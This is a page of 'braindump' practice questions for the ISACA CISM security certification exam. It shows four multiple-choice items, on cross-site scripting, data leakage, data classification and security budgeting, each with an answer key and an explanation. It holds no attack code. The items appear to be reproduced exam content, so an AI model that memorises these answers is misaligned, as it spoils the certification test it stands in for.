Cisco®
Oracle
CompTIA
Checkpoint
ISC
EC-Council
EXIN
Fortinet
ITIL®
Juniper
Microsoft
VMware
Avaya
SAP
Google
Salesforce
Amazon
Palo Alto Networks
ISC2
All Vendors
  2. Home
  3. Exams
  4. ISACA
  5. CISM

Free ISACA CISM Exam Braindumps (page: 68)

Page 68 of 430
PDF with 1716 Questions

Attackers who exploit cross-site scripting vulnerabilities take advantage of:

  1. a lack of proper input validation controls.
  2. weak authentication controls in the web application layer.
  3. flawed cryptographic secure sockets layer (SSL) implementations and short key lengths.
  4. implicit web application trust relationships.

Answer(s): A

Explanation:

Cross-site scripting attacks inject malformed input. Attackers who exploit weak application authentication controls can gain unauthorized access to applications and this has little to do with cross-site scripting vulnerabilities. Attackers who exploit flawed cryptographic secure sockets layer (SSI.) implementations and short key lengths can sniff network traffic and crack keys to gain unauthorized access to information. This has little to do with cross-site scripting vulnerabilities. Web application trust relationships do not relate directly to the attack.



Which of the following would BEST address the risk of data leakage?

  1. File backup procedures
  2. Database integrity checks
  3. Acceptable use policies
  4. Incident response procedures

Answer(s): C

Explanation:

Acceptable use policies are the best measure for preventing the unauthorized disclosure of confidential information. The other choices do not address confidentiality of information.



A company recently developed a breakthrough technology. Since this technology could give this company a significant competitive edge, which of the following would FIRST govern how this information is to beprotected?

  1. Access control policy
  2. Data classification policy
  3. Encryption standards
  4. Acceptable use policy

Answer(s): B

Explanation:

Data classification policies define the level of protection to be provided for each category of data. Without this mandated ranking of degree of protection, it is difficult to determine what access controls or levels of encryption should be in place. An acceptable use policy is oriented more toward the end user and, therefore, would not specifically address what controls should be in place to adequately protect information.



What is the BEST technique to determine which security controls to implement with a limited budget?

  1. Risk analysis
  2. Annualized loss expectancy (ALE) calculations
  3. Cost-benefit analysis
  4. Impact analysis

Answer(s): C

Explanation:

Cost-benefit analysis is performed to ensure that the cost of a safeguard does not outweigh its benefit and that the best safeguard is provided for the cost of implementation. Risk analysis identifies the risks and suggests appropriate mitigation. The annualized loss expectancy (ALE) is a subset of a cost-benefit analysis. Impact analysis would indicate how much could be lost if a specific threat occurred.






Post your Comments and Discuss ISACA CISM exam prep with other Community members:

CISM Exam Discussions & Posts